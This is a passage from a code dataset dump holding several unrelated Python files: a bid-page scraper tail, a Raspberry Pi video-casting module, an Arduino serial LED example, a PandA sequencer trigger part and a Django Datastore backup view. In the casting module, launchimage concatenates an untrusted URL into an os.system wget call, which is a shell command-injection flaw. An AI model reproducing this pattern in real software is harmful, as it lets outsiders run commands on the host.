\"中标金额(万元)\":\n return ps[3].get_text()\n elif ps_tmp == \"中标金额\":\n if ps[3].get_text() == \"(元)\":\n return ps[4].get_text()\n elif ps_tmp == \"中标金额(元)\":\n return ps[3].get_text()\n elif ps_tmp == \"中标金额(元)\":\n return ps[3].get_text()\n elif ps_tmp == \"中标(选)价(元)\":\n return ps[3].get_text()\n\n elif ps_tmp_t == \"中标金额(万元)\":\n return ps[4].get_text()\n if ps_tmp == \"中标金额(万元)\":\n return ps[3].get_text()\n elif ps_tmp_t == \"中标金额(元)\":\n return ps[4].get_text()\n elif ps_tmp == \"中标金额(元)\":\n return ps[4].get_text()\n elif ps_tmp_t == \"中标(选)价(元)\":\n return ps[4].get_text()\n elif ps_tmp_t == \"中标金额\":\n return ps[4].get_text()\n\n\nif __name__ == \"__main__\":\n parse_outer_page()\n data_outer_dict = {\n '项目名称': name_list, '项目链接': link_list, '刊登日期': date_p_list\n }\n\n parse_inner_page()\n data_inner_dict = {\n '项目名称': name_list, '项目链接': link_list, '刊登日期': date_p_list, '项目招标人': t_name_list,\n '项目招标编号': 
t_num_list, '项目代理机构': t_depa_list, '工商注册号': BRN_list, '拟中标人': proposed_bidder,\n '中标价(费率)': w_price_list, '第二中标候选人': w_s_name_bidder_list, '第二中标价格': w_s_price_list,\n '第三中标候选人': w_t_name_bidder_list, '第三中标价格': w_t_price_list, '第一中标人': w_f_name_bidder_list\n }\n\n print(data_inner_dict)\n pd.DataFrame(data_outer_dict).to_csv(r'C:\\Users\\13754\\Desktop\\SpidersDemo(1).csv')\n pd.DataFrame(data_inner_dict).to_csv(r'C:\\Users\\13754\\Desktop\\SpidersDemo(3).csv')\n","sub_path":"Demo.py","file_name":"Demo.py","file_ext":"py","file_size_in_byte":14684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"627588310","text":"import os\nimport sys\nimport time\nimport json\nimport socket\nimport base64\nimport pygame\nimport signal\nimport logging\nimport threading\nimport youtube_dl\n\nfrom PIL import Image\nfrom omxplayer.player import OMXPlayer\n\nlogger = logging.getLogger(\"RaspberryCast\")\nvolume = 0\nplayer = None\n\nDIR_PATH = os.path.dirname(os.path.abspath(__file__))\n\n# Volume\ntry:\n with open(os.path.join(DIR_PATH, \"volume\"), \"r\") as f:\n volume = int(f.read())\nexcept Exception as e:\n volume = 0\n\n# SIGTERM handler\ndef terminationhandler(signum, frame):\n sys.exit(0)\n\nsignal.signal(signal.SIGTERM, terminationhandler)\n\n# Pygame Initialization\npygame.display.init()\npygame.font.init()\npygame.mouse.set_visible(0)\nscreen = pygame.display.set_mode((0,0), pygame.FULLSCREEN)\n\ndef aspectscale(img, size):\n ix,iy = img.get_size()\n bx, by = size\n\n if ix > iy:\n # fit to width\n scale_factor = bx/float(ix)\n sy = scale_factor * iy\n if sy > by:\n scale_factor = by/float(iy)\n sx = scale_factor * ix\n sy = by\n else:\n sx = bx\n else:\n # fit to height\n scale_factor = by/float(iy)\n sx = scale_factor * ix\n if sx > bx:\n scale_factor = bx/float(ix)\n sx = bx\n sy = scale_factor * iy\n else:\n sy = by\n\n return pygame.transform.scale(img, (int(sx), int(sy)))\n\n\ndef displaysurface(surface, show_ip):\n x_centered = screen.get_size()[0] / 2 - surface.get_size()[0] / 2\n y_centered = screen.get_size()[1] / 2 - surface.get_size()[1] / 2\n\n screen.blit(surface, (x_centered, y_centered))\n\n if show_ip:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n ip_address = s.getsockname()[0]\n s.close()\n font = pygame.font.SysFont('Arial', screen.get_size()[0] // 24)\n text = font.render(ip_address, True, (128, 128, 128))\n screen.blit(text, (screen.get_size()[0] // 12, screen.get_size()[1] * 7 // 8))\n\n pygame.display.update()\n\n\ndef displayimage(imagefilename):\n surface = pygame.Surface(screen.get_size()).convert_alpha()\n pil_img = Image.open(imagefilename).convert('RGB')\n mode = pil_img.mode\n size = pil_img.size\n data = pil_img.tobytes()\n img = aspectscale(pygame.image.fromstring(data, size, mode), (screen.get_size()))\n x_centered = screen.get_size()[0] / 2 - img.get_size()[0] / 2\n y_centered = screen.get_size()[1] / 2 - img.get_size()[1] / 2\n surface.blit(img, (x_centered, y_centered))\n displaysurface(surface, False)\n\n\nready_surf = pygame.Surface(screen.get_size())\nready_img = aspectscale(pygame.image.load(os.path.join(DIR_PATH, \"images\", \"ready.jpg\")), (screen.get_size()))\nready_img_x_centered = screen.get_size()[0] / 2 - ready_img.get_size()[0] / 2\nready_img_y_centered = screen.get_size()[1] / 2 - ready_img.get_size()[1] / 2\nready_surf.blit(ready_img, (ready_img_x_centered, ready_img_y_centered))\n\nprocessing_surf = pygame.Surface(screen.get_size())\nprocessing_img = 
aspectscale(pygame.image.load(os.path.join(DIR_PATH, \"images\", \"processing.jpg\")), (screen.get_size()))\nprocessing_img_x_centered = screen.get_size()[0] / 2 - processing_img.get_size()[0] / 2\nprocessing_img_y_centered = screen.get_size()[1] / 2 - processing_img.get_size()[1] / 2\nprocessing_surf.blit(processing_img, (processing_img_x_centered, processing_img_y_centered))\n\ndisplaysurface(ready_surf, True)\n\ndef playeraction(action):\n global player\n try:\n player.action(action)\n except Exception as e:\n print(e)\n except:\n raise\n\n\ndef launchhome():\n global player\n try:\n player.quit() #Kill previous instance of OMX\n except Exception as e:\n print(e)\n except:\n raise\n\n displaysurface(ready_surf, True)\n\n\ndef launchimage(url):\n global player\n try:\n player.quit() #Kill previous instance of OMX\n except Exception as e:\n print(e)\n except:\n raise\n\n try:\n os.system(\"rm download/image\")\n if \"data:image/\" in url:\n if \"base64,\" in url:\n logger.info(\"Base64 Image Data Received\")\n data = url.split(',')[1].strip()\n pad = len(data) % 4\n data += \"=\" * pad\n b64img = base64.b64decode(data)\n imgfile = open('download/image', 'wb')\n imgfile.write(b64img)\n imgfile.close()\n else:\n logger.info(\"Url Image Data Received\")\n os.system(\"wget -O download/image \" + url)\n except Exception as e:\n print(e)\n except:\n raise\n\n displayimage(os.path.join(DIR_PATH, \"download\", \"image\"))\n\n\ndef launchvideo(url, config, sub=False):\n setState(\"2\")\n\n try:\n player.quit() #Kill previous instance of OMX\n except Exception as e:\n print(e)\n except:\n raise\n\n if config[\"new_log\"]:\n displaysurface(processing_surf, False)\n\n logger.info('Extracting source video URL...')\n out = return_full_url(url, sub=sub, slow_mode=config[\"slow_mode\"])\n\n logger.debug(\"Full video URL fetched.\")\n\n thread = threading.Thread(target=playWithOMX, args=(out, sub,),\n kwargs=dict(width=config[\"width\"], height=config[\"height\"],\n new_log=config[\"new_log\"]))\n thread.start()\n\n\ndef queuevideo(url, config, onlyqueue=False):\n logger.info('Extracting source video URL, before adding to queue...')\n\n out = return_full_url(url, sub=False, slow_mode=config[\"slow_mode\"])\n\n logger.info(\"Full video URL fetched.\")\n\n if getState() == \"0\" and not onlyqueue:\n logger.info('No video currently playing, playing video instead of \\\nadding to queue.')\n thread = threading.Thread(target=playWithOMX, args=(out, False,),\n kwargs=dict(width=config[\"width\"], height=config[\"height\"],\n new_log=config[\"new_log\"]))\n thread.start()\n else:\n if out is not None:\n with open('video.queue', 'a') as f:\n f.write(out+'\\n')\n\n\ndef return_full_url(url, sub=False, slow_mode=False):\n logger.debug(\"Parsing source url for \"+url+\" with subs :\"+str(sub))\n\n if ((url[-4:] in (\".avi\", \".mkv\", \".mp4\", \".mp3\")) or\n (sub) or (\".googlevideo.com/\" in url)):\n logger.debug('Direct video URL, no need to use youtube-dl.')\n return url\n\n ydl = youtube_dl.YoutubeDL(\n {\n 'logger': logger,\n 'noplaylist': True,\n 'ignoreerrors': True,\n }) # Ignore errors in case of error in long playlists\n with ydl: # Downloading youtub-dl infos. We just want to extract the info\n result = ydl.extract_info(url, download=False)\n\n if result is None:\n logger.error(\n \"Result is none, returning none. 
Cancelling following function.\")\n return None\n\n if 'entries' in result: # Can be a playlist or a list of videos\n video = result['entries'][0]\n else:\n video = result # Just a video\n\n if \"youtu\" in url:\n if slow_mode:\n for i in video['formats']:\n if i['format_id'] == \"18\":\n logger.debug(\n \"Youtube link detected, extracting url in 360p\")\n return i['url']\n else:\n logger.debug('''CASTING: Youtube link detected.\nExtracting url in maximal quality.''')\n for fid in ('22', '18', '36', '17'):\n for i in video['formats']:\n if i['format_id'] == fid:\n logger.debug(\n 'CASTING: Playing highest video quality ' +\n i['format_note'] + '(' + fid + ').'\n )\n return i['url']\n elif \"vimeo\" in url:\n if slow_mode:\n for i in video['formats']:\n if i['format_id'] == \"http-360p\":\n logger.debug(\"Vimeo link detected, extracting url in 360p\")\n return i['url']\n else:\n logger.debug(\n 'Vimeo link detected, extracting url in maximal quality.')\n return video['url']\n else:\n logger.debug('''Video not from Youtube or Vimeo.\nExtracting url in maximal quality.''')\n return video['url']\n\n\ndef playlist(url, cast_now, config):\n logger.info(\"Processing playlist.\")\n\n if cast_now:\n logger.info(\"Playing first video of playlist\")\n launchvideo(url, config) # Launch first video\n else:\n queuevideo(url, config)\n\n thread = threading.Thread(target=playlistToQueue, args=(url, config))\n thread.start()\n\n\ndef playlistToQueue(url, config):\n logger.info(\"Adding every videos from playlist to queue.\")\n ydl = youtube_dl.YoutubeDL(\n {\n 'logger': logger,\n 'extract_flat': 'in_playlist',\n 'ignoreerrors': True,\n })\n with ydl: # Downloading youtub-dl infos\n result = ydl.extract_info(url, download=False)\n for i in result['entries']:\n logger.info(\"queuing video\")\n if i != result['entries'][0]:\n queuevideo(i['url'], config)\n\n\ndef playWithOMX(url, sub, width=\"\", height=\"\", new_log=False):\n global player\n logger.info(\"Starting OMXPlayer now.\")\n\n logger.info(\"Attempting to read resolution from configuration file.\")\n\n resolution = \"\"\n\n if width or height:\n resolution = \" --win '0 0 {0} {1}'\".format(width, height)\n\n setState(\"1\")\n displaysurface(ready_surf, True)\n args = \"-b\" + resolution + \" --vol \" + str(volume) #+ \" -o alsa\"\n if sub:\n player = OMXPlayer(url, args + \" --subtitles subtitle.srt\")\n elif url is None:\n pass\n else:\n player = OMXPlayer(url, args)\n\n try:\n while not player.playback_status() == \"Stopped\": # Wait until video finished or stopped\n time.sleep(0.5)\n except Exception as e:\n print(e)\n except:\n raise\n\n if getState() != \"2\": # In case we are again in the launchvideo function\n setState(\"0\")\n with open('video.queue', 'r') as f:\n # Check if there is videos in queue\n first_line = f.readline().replace('\\n', '')\n if first_line != \"\":\n logger.info(\"Starting next video in playlist.\")\n with open('video.queue', 'r') as fin:\n data = fin.read().splitlines(True)\n with open('video.queue', 'w') as fout:\n fout.writelines(data[1:])\n thread = threading.Thread(\n target=playWithOMX, args=(first_line, False,),\n kwargs=dict(width=width, height=height,\n new_log=new_log),\n )\n thread.start()\n else:\n logger.info(\"Playlist empty, skipping.\")\n\n\ndef setState(state):\n # Write to file so it can be accessed from everywhere\n os.system(\"echo \"+state+\" > state.tmp\")\n\n\ndef getState():\n with open('state.tmp', 'r') as f:\n return f.read().replace('\\n', '')\n\n\ndef setVolume(vol):\n global volume\n if vol 
== \"more\":\n volume += 300\n if vol == \"less\":\n volume -= 300\n with open(os.path.join(DIR_PATH, \"volume\"), \"w\") as f:\n f.write(str(volume))\n","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"609251447","text":"#!/usr/bin/env python\n# Comando command protocol example\n# 2016/05/01 : Brett Graham\n#\n# This is the follow up example that shows how to control the Arduino led\n# blinking pattern by sending and receiving commands with multiple arguments\n#\n#\n# see libraries/comando/examples/commands_led_blink in the\n# comando repository for the corresponding arduino code\n#\n# for more detailed explanation, go to examples/commands_led_on_off.py\n# in to comando repository\n\nimport sys\nimport time\n\nimport pycomando\nimport serial\n\nif len(sys.argv) < 2:\n raise Exception(\"A serial port must be supplied: commands.py \")\nport = sys.argv[1]\n\nserial_port = serial.Serial(port, 9600)\n\ncom = pycomando.Comando(serial_port)\ntext = pycomando.protocols.TextProtocol(com)\ncmd = pycomando.protocols.CommandProtocol(com)\n\n\ncom.register_protocol(0, text)\ncom.register_protocol(1, cmd)\n\n\ndef print_message(msg):\n print(\"from arduino->%s\" % msg)\n\n\n# get_arg and has_arg can be repeatedly executed to grab incoming data\n# as many times as you like\ndef led_set(cmd):\n # if no data is received, raise an error\n if not cmd.has_arg():\n raise Exception(\"Invalid led_set response, missing both arg\")\n # grab the first piece of data\n v = cmd.get_arg(int)\n # print out the number\n print(\"Led on time was set to: %s ms\" % v)\n # check if the second argument is missing\n if not cmd.has_arg():\n raise Exception(\"missing the 2nd arg\")\n # if not, grab the second piece of data\n b = cmd.get_arg(int)\n # print out the number\n print(\"Led off time was set to: %s ms\" % b)\n\n\ntext.receive_message = print_message\n\ncmd.register_callback(0, led_set)\n\n\n\ntry:\n while True:\n try:\n # input as first argument\n i = int(raw_input(\n \"Please input a value for the led ontime (ms): \" ))\n # input as second argument\n b = int(raw_input(\n \"please input a value for the led offtime (ms): \"))\n # send_command iterates through the list of arguments, and\n # sends the arguments one at a time\n cmd.send_command(0, [i,b])\n\n except Exception as e:\n print(\"Invalid input: %s\" % e)\n\n time.sleep(0.1)\n try:\n while serial_port.inWaiting():\n com.handle_stream()\n except Exception as e:\n print(\"%s\" % e)\nexcept KeyboardInterrupt:\n serial_port.close()\n","sub_path":"examples/commands_led_blink.py","file_name":"commands_led_blink.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"460533429","text":"# Treat all division as float division even in python2\nfrom __future__ import division\n\nfrom annotypes import add_call_types, Anno, TYPE_CHECKING\nfrom scanpointgenerator import Point\n\nfrom malcolm.core import APartName, Block, Attribute, Context, PartRegistrar\nfrom malcolm.modules import builtin, scanning, pmac\nfrom malcolm.modules.pmac.util import all_points_joined\nfrom ..util import SequencerTable, Trigger\n\nimport numpy as np\n\nif TYPE_CHECKING:\n from typing import List, Tuple, Dict\n\n#: The SEQ.table attributes that should be present in PANDA.exports\nSEQ_TABLES = (\"seqTableA\", \"seqTableB\")\n\n#: The number of sequencer table 
rows\nSEQ_TABLE_ROWS = 4096\n\nwith Anno(\"Scannable name for sequencer input\"):\n APos = str\n\n# Pull re-used annotypes into our namespace in case we are subclassed\nAPartName = APartName\nAMri = builtin.parts.AMri\nAInitialVisibility = builtin.parts.AInitialVisibility\n\n# How long is a single tick if prescaler is 0\nTICK = 8e-9\n\n# How long is the smallest pulse that will travel across TTL\nMIN_PULSE = 1250 # ticks = 10us\n\n# How long the last pulse should be (50% duty cycle) to make sure we don't flip\n# to an unfilled sequencer and produce a false pulse. This should be at least\n# as long as it takes the PandA EPICS driver to see that we got the last frame\n# and disarm PCAP\nLAST_PULSE = 125000000 # ticks = 1s\n\n# Maximum repeats of a single row\nMAX_REPEATS = 4096\n\n\ndef seq_row(repeats=1, trigger=Trigger.IMMEDIATE, position=0,\n half_duration=MIN_PULSE, live=0, dead=0):\n # type: (int, str, int, int, int, int) -> List\n \"\"\"Create a 50% duty cycle pulse with phase1 having given live/dead values\n \"\"\"\n row = [repeats, trigger, position,\n # Phase1\n half_duration, live, dead, 0, 0, 0, 0,\n # Phase2\n half_duration, 0, 0, 0, 0, 0, 0]\n return row\n\n\ndef _get_blocks(context, panda_mri):\n # type: (Context, str) -> List[Block]\n \"\"\"Get panda, seqA and seqB Blocks using the given context\"\"\"\n # {part_name: export_name}\n panda = context.block_view(panda_mri)\n seq_part_names = {}\n for source, export in panda.exports.value.rows():\n if export in SEQ_TABLES:\n assert source.endswith(\".table\"), \\\n \"Expected export %s to come from SEQx.table, got %s\" % (\n export, source)\n seq_part_names[source[:-len(\".table\")]] = export\n assert tuple(sorted(seq_part_names.values())) == SEQ_TABLES, \\\n \"Expected exported attributes %s, got %s\" % (\n SEQ_TABLES, panda.exports.value.export)\n # {export_name: mri}\n seq_mris = {}\n for name, mri, _, _, _ in panda.layout.value.rows():\n if name in seq_part_names:\n export = seq_part_names[name]\n seq_mris[export] = mri\n assert sorted(seq_mris) == sorted(seq_part_names.values()), \\\n \"Couldn't find MRI for some of %s\" % (seq_part_names.values(),)\n blocks = [panda]\n blocks += [context.block_view(seq_mris[x]) for x in SEQ_TABLES]\n return blocks\n\n\ndef _what_moves_most(point, axis_mapping):\n # type: (Point, Dict[str, pmac.infos.MotorInfo]) -> Tuple[str, int, bool]\n \"\"\"Work out which axis from the given axis mapping moves most for this\n point\"\"\"\n # TODO: should use new velocity calcs when Giles has finished\n # {axis_name: abs(diff_cts)}\n diffs = {}\n # {axis_name: (compare_cts, increasing)}\n compare_increasing = {}\n for s, info in axis_mapping.items():\n compare_cts = info.in_cts(point.lower[s])\n centre_cts = info.in_cts(point.positions[s])\n diff_cts = centre_cts - compare_cts\n if diff_cts != 0:\n diffs[s] = abs(diff_cts)\n compare_increasing[s] = (compare_cts, diff_cts > 0)\n\n assert diffs, \\\n \"Can't work out a compare point for %s, maybe none of the axes \" \\\n \"connected to the PandA are moving during the scan point?\" % \\\n point.positions\n\n # Sort on abs(diff), take the biggest\n axis_name = sorted(diffs, key=diffs.get)[-1]\n compare_cts, increasing = compare_increasing[axis_name]\n return axis_name, compare_cts, increasing\n\n\ndef doing_pcomp(row_trigger_value):\n # type: (str) -> bool\n return row_trigger_value == \"Position Compare\"\n\n\nclass PandASeqTriggerPart(builtin.parts.ChildPart):\n \"\"\"Part for operating a pair of SEQ blocks in a PandA to do position\n compare at the start of 
each row and time based pulses within the row.\n Needs the following exports:\n\n - seqTableA: table Attribute of the first SEQ block\n - seqTableB: table Attribute of the second SEQ block\n - seqSetEnable: forceSet Method of an SRGATE that is used to gate both SEQs\n \"\"\"\n\n def __init__(self, name, mri, initial_visibility=None):\n # type: (APartName, AMri, AInitialVisibility) -> None\n super(PandASeqTriggerPart, self).__init__(\n name, mri, initial_visibility=initial_visibility, stateful=False)\n # Stored generator for positions\n self.generator = None\n # The last index we have loaded\n self.loaded_up_to = 0\n # The last scan point index of the current run\n self.scan_up_to = 0\n # If we are currently loading then block loading more points\n self.loading = False\n # The last point we loaded\n self.last_point = None\n # What is the mapping of scannable name to MotorInfo\n self.axis_mapping = {}\n # The minimum turnaround time for non-joined points\n self.min_turnaround = 0\n # The minimum time between turnaround points\n self.min_interval = 0\n # {(scannable, increasing): trigger_enum}\n self.trigger_enums = {}\n # The panda Block we will be prodding\n self.panda = None\n\n def setup(self, registrar):\n # type: (PartRegistrar) -> None\n super(PandASeqTriggerPart, self).setup(registrar)\n # Hooks\n registrar.hook(scanning.hooks.ReportStatusHook, self.on_report_status)\n registrar.hook((scanning.hooks.ConfigureHook,\n scanning.hooks.SeekHook,\n scanning.hooks.PostRunArmedHook), self.on_configure)\n registrar.hook(scanning.hooks.RunHook, self.on_run)\n\n @add_call_types\n def on_report_status(self, context):\n # type: (scanning.hooks.AContext) -> scanning.hooks.UInfos\n child = context.block_view(self.mri)\n # Work out if we need the motor controller to send start of row triggers\n # or no triggers\n if doing_pcomp(child.rowTrigger.value):\n # Doing position compare, don't need any triggers\n trigger = scanning.infos.MotionTrigger.NONE\n else:\n # Waiting for bit at the start of each row, so need this signal\n trigger = scanning.infos.MotionTrigger.ROW_GATE\n info = scanning.infos.MotionTriggerInfo(trigger)\n return info\n\n def setup_pcomp_dicts(self, seqa, seqb, axis_mapping):\n \"\"\"Setup the axis_mapping and trigger_enum dicts for position compare\"\"\"\n # type: (Block, Block, Dict[str, pmac.infos.MotorInfo]) -> None\n # Check that both sequencers are pointing to the same encoders\n seq_pos = {}\n for suff in \"abc\":\n # Something like INENC1.VAL or ZERO\n seqa_pos_inp = seqa[\"pos\" + suff].value\n seqb_pos_inp = seqb[\"pos\" + suff].value\n assert seqa_pos_inp == seqb_pos_inp, \\\n \"SeqA Pos%s = %s != SeqB Pos%s = %s\" % (\n suff, seqa_pos_inp, suff, seqb_pos_inp)\n seq_pos[seqa_pos_inp] = \"POS%s\" % suff.upper()\n\n # Fix the mres and offsets from the panda positions table\n positions_table = self.panda.positions.value\n for i, name in enumerate(positions_table.name):\n try:\n pos = seq_pos[name]\n except KeyError:\n # This is a position not connected to the seq, this is fine\n pass\n else:\n # This is a position that we can compare on, check its\n # dataset name which is the scannable name\n scannable = positions_table.datasetName[i]\n info = axis_mapping.get(scannable, None)\n if info:\n # We are asked to scan this, so correct its resolution\n # and store\n info.resolution = positions_table.scale[i]\n info.offset = positions_table.offset[i]\n self.axis_mapping[scannable] = info\n self.trigger_enums[(scannable, True)] = \\\n \"%s>=POSITION\" % pos\n 
self.trigger_enums[(scannable, False)] = \\\n \"%s<=POSITION\" % pos\n # Check we have at least one entry\n assert self.axis_mapping, \\\n \"None of the seq inputs %s can be mapped to scannable names \" \\\n \"in %s. Did you define datasetName entries for these rows in \" \\\n \"the PandA positions table?\" % (\n sorted(seq_pos), sorted(axis_mapping))\n\n # Allow CamelCase as these parameters will be serialized\n # noinspection PyPep8Naming\n @add_call_types\n def on_configure(self,\n context, # type: scanning.hooks.AContext\n completed_steps, # type: scanning.hooks.ACompletedSteps\n steps_to_do, # type: scanning.hooks.AStepsToDo\n part_info, # type: scanning.hooks.APartInfo\n generator, # type: scanning.hooks.AGenerator\n axesToMove # type: scanning.hooks.AAxesToMove\n ):\n # type: (...) -> None\n self.generator = generator\n self.loaded_up_to = completed_steps\n self.scan_up_to = completed_steps + steps_to_do\n self.loading = False\n self.last_point = None\n\n # Get the panda and the pmac we will be using\n child = context.block_view(self.mri)\n panda_mri = child.panda.value\n pmac_mri = child.pmac.value\n row_trigger = child.rowTrigger.value\n\n # See if there is a minimum turnaround\n infos = scanning.infos.MinTurnaroundInfo.filter_values(part_info)\n if infos:\n assert len(infos) == 1, \\\n \"Expected 0 or 1 MinTurnaroundInfos, got %d\" % len(infos)\n self.min_turnaround = max(pmac.util.MIN_TIME, infos[0].gap)\n self.min_interval = infos[0].interval\n else:\n self.min_turnaround = pmac.util.MIN_TIME\n self.min_interval = pmac.util.MIN_INTERVAL\n\n # Get panda Block, and the sequencer Blocks so we can do some checking\n self.panda, seqa, seqb = _get_blocks(context, panda_mri)\n\n # Fill in motor infos and trigger lookups\n motion_axes = pmac.util.get_motion_axes(generator, axesToMove)\n self.axis_mapping = {}\n self.trigger_enums = {}\n\n if motion_axes:\n # Need to fill in the axis mapping\n axis_mapping = pmac.util.cs_axis_mapping(\n context, context.block_view(pmac_mri).layout.value, motion_axes)\n if doing_pcomp(row_trigger):\n # We need to do position compare, so only place the infos into\n # axis_mapping that our sequencer can see\n self.setup_pcomp_dicts(seqa, seqb, axis_mapping)\n else:\n # We rely on the inputs coming into SEQ bitA\n assert seqa[\"bita\"].value == seqb[\"bita\"].value != \"ZERO\", \\\n \"SEQ.bita inputs need to point to the same non-zero input\"\n self.axis_mapping = axis_mapping\n\n # TODO:\n # Check that the sequencer blocks have the correct wiring, delays, and\n # setup monitors on the active field\n assert seqa\n assert seqb\n\n # load up the first SEQ\n self._fill_sequencer(self.panda[SEQ_TABLES[0]])\n\n def _how_long_moving_wrong_way(self, axis_name, point, increasing):\n # type: (str, Point, bool) -> float\n \"\"\"Work out the turnaround for the axis with the given MotorInfo, and\n how long it is moving in the opposite direction from where we want it to\n be going for point\"\"\"\n time_arrays, velocity_arrays = pmac.util.profile_between_points(\n self.axis_mapping, self.last_point, point, self.min_turnaround,\n self.min_interval)\n info = self.axis_mapping[axis_name]\n time_array = time_arrays[info.scannable]\n velocity_array = velocity_arrays[info.scannable]\n\n # Work backwards through the velocity array until we are going the\n # opposite way\n i = 0\n for i, v in reversed(list(enumerate(velocity_array))):\n # Divide v by resolution so it is in counts\n v /= info.resolution\n if (increasing and v <= 0) or (not increasing and v >= 0):\n # The axis is 
stationary or going the wrong way at this\n # point, so we should be blind before then\n assert i < len(velocity_array) - 1, \\\n \"Last point of %s is wrong direction\" % velocity_array\n break\n blind = time_array[i]\n return blind\n\n @staticmethod\n def _get_row_indices(points):\n \"\"\"Generate list of start and end indices for separate rows\n\n This excludes the initial row, which is handled separately.\n \"\"\"\n points_joined = all_points_joined(points)\n\n if points_joined is not None and len(points_joined) > 0:\n results = np.nonzero(np.invert(points_joined))[0]\n results += 1\n start_indices = results\n else:\n start_indices = np.array([])\n\n # end_index = start_index + size\n end_indices = np.empty(len(start_indices), dtype=int)\n if start_indices.size:\n end_indices[:-1] = start_indices[1:]\n end_indices[-1] = len(points)\n\n return start_indices, end_indices\n\n @staticmethod\n def _generate_immediate_rows(durations):\n \"\"\"Create a series of immediate rows from `durations`\"\"\"\n pairwise_equal = np.empty(len(durations), dtype=bool)\n pairwise_equal[0] = True # Initial duration starts first row\n\n np.not_equal(durations[:-1], durations[1:], out=pairwise_equal[1:])\n start_indices = np.nonzero(pairwise_equal)\n seq_durations = durations[start_indices]\n seq_lengths = np.diff(np.append(start_indices, len(durations)))\n\n rows = []\n for duration, count in zip(seq_durations, seq_lengths):\n half_frame = int(round(duration / TICK / 2))\n complete_rows = count // MAX_REPEATS\n remaining = count % MAX_REPEATS\n\n # accumulate across duration groups: reassigning rows here would throw\n # away the rows already generated for earlier groups\n rows.extend([seq_row(repeats=MAX_REPEATS, half_duration=half_frame,\n live=1)] * complete_rows)\n rows.append(seq_row(repeats=remaining, half_duration=half_frame,\n live=1))\n\n return rows\n\n def _generate_triggered_rows(self, points, start_index, end_index,\n add_blind):\n \"\"\"Generate sequencer rows corresponding to a triggered points row\"\"\"\n rows = []\n initial_point = points[start_index]\n half_frame = int(round(initial_point.duration / TICK / 2))\n\n if self.trigger_enums:\n # Position compare\n # First row, or rows not joined\n # Work out which axis moves most during this point\n axis_name, compare_cts, increasing = _what_moves_most(\n initial_point, self.axis_mapping)\n\n if add_blind:\n # How long to be blind for during the turnaround\n blind = self._how_long_moving_wrong_way(\n axis_name, initial_point, increasing)\n half_blind = int(round(blind / TICK / 2))\n rows.append(seq_row(half_duration=half_blind, dead=1))\n\n # Create a compare point for the next row\n rows.append(seq_row(\n trigger=self.trigger_enums[(axis_name, increasing)],\n position=compare_cts, half_duration=half_frame, live=1))\n else:\n # Row trigger coming in on BITA\n\n if add_blind:\n # Produce dead pulse as soon as row has finished\n rows.append(seq_row(\n half_duration=MIN_PULSE, dead=1, trigger=Trigger.BITA_0))\n\n rows.append(seq_row(\n trigger=Trigger.BITA_1, half_duration=half_frame, live=1))\n\n rows.extend(self._generate_immediate_rows(\n points.duration[start_index+1:end_index]))\n\n return rows
\n\n def _fill_sequencer(self, seq_table):\n # type: (Attribute) -> None\n points = self.generator.get_points(self.loaded_up_to, self.scan_up_to)\n\n if points is None or len(points) == 0:\n table = SequencerTable.from_rows([])\n seq_table.put_value(table)\n return\n\n rows = []\n\n if not self.axis_mapping:\n # No position compare or row triggering required\n rows.extend(\n self._generate_immediate_rows(points.duration))\n\n # one last dead frame signal\n rows.append(seq_row(half_duration=LAST_PULSE, dead=1))\n\n if len(rows) > SEQ_TABLE_ROWS:\n raise Exception(\"Seq table: {} rows with {} maximum\".format(\n len(rows), SEQ_TABLE_ROWS))\n\n table = SequencerTable.from_rows(rows)\n seq_table.put_value(table)\n return\n\n start_indices, end_indices = self._get_row_indices(points)\n\n point = points[0]\n first_point_static = point.positions == point.lower == point.upper\n end = start_indices[0] if start_indices.size else len(points)\n if not first_point_static:\n # If the motors are moving during this point then\n # wait for triggers\n rows.extend(self._generate_triggered_rows(points, 0, end, False))\n else:\n # This first row should not wait, and will trigger immediately\n rows.extend(self._generate_immediate_rows(points.duration[0:end]))\n\n for start, end in zip(start_indices, end_indices):\n # First row handled outside of loop\n self.last_point = points[start-1]\n\n rows.extend(self._generate_triggered_rows(points, start, end, True))\n\n # one last dead frame signal\n rows.append(seq_row(half_duration=LAST_PULSE, dead=1))\n\n if len(rows) > SEQ_TABLE_ROWS:\n raise Exception(\"Seq table: {} rows with {} maximum\".format(\n len(rows), SEQ_TABLE_ROWS))\n\n table = SequencerTable.from_rows(rows)\n seq_table.put_value(table)\n\n @add_call_types\n def on_run(self, context):\n # type: (scanning.hooks.AContext) -> None\n # Call sequence table enable\n self.panda.seqSetEnable()
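\n\n\n# A hedged, illustrative helper (not used by the part above): it mirrors the\n# int(round(duration / TICK / 2)) arithmetic used throughout, converting a frame duration in\n# seconds into the 50% duty cycle half_duration in ticks that seq_row expects. For example\n# 0.1 s -> 6250000 ticks, and MIN_PULSE is 1250 ticks * 8 ns = 10 us, matching its comment.\ndef _half_duration_in_ticks(duration_seconds):\n # type: (float) -> int\n return int(round(duration_seconds / TICK / 2))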
Not backing up\"\n logger.info(msg)\n return HttpResponse(msg)\n\n gcs_bucket = get_backup_setting(\"GCS_BUCKET\")\n backup_name = get_backup_setting(\"NAME\")\n queue = get_backup_setting(\"QUEUE\", required=False)\n exclude_models = get_backup_setting(\"EXCLUDE_MODELS\", required=False, default=[])\n exclude_apps = get_backup_setting(\"EXCLUDE_APPS\", required=False, default=[])\n\n models = []\n for model in apps.get_models(include_auto_created=True):\n app_label = model._meta.app_label\n object_name = model._meta.object_name\n model_def = \"{}.{}\".format(app_label, object_name)\n\n if app_label in exclude_apps:\n logger.info(\n \"Not backing up {} due to {} being in DS_BACKUP_EXCLUDE_APPS\".format(\n model_def, app_label))\n continue\n\n if model_def in exclude_models:\n logger.info(\n \"Not backing up {} as it is present in DS_BACKUP_EXCLUDE_MODELS\".format(\n model_def))\n continue\n\n logger.info(\"Backing up {}\".format(model_def))\n models.append(model)\n\n if not models:\n raise Exception(\"No models to back up\")\n\n kinds = \"&kind=\".join(m._meta.db_table for m in models)\n\n backup_url = (\n \"{backup_handler}\"\n \"?name={backup_name}\"\n \"&gs_bucket_name={gcs_bucket}\"\n \"&filesystem=gs\"\n 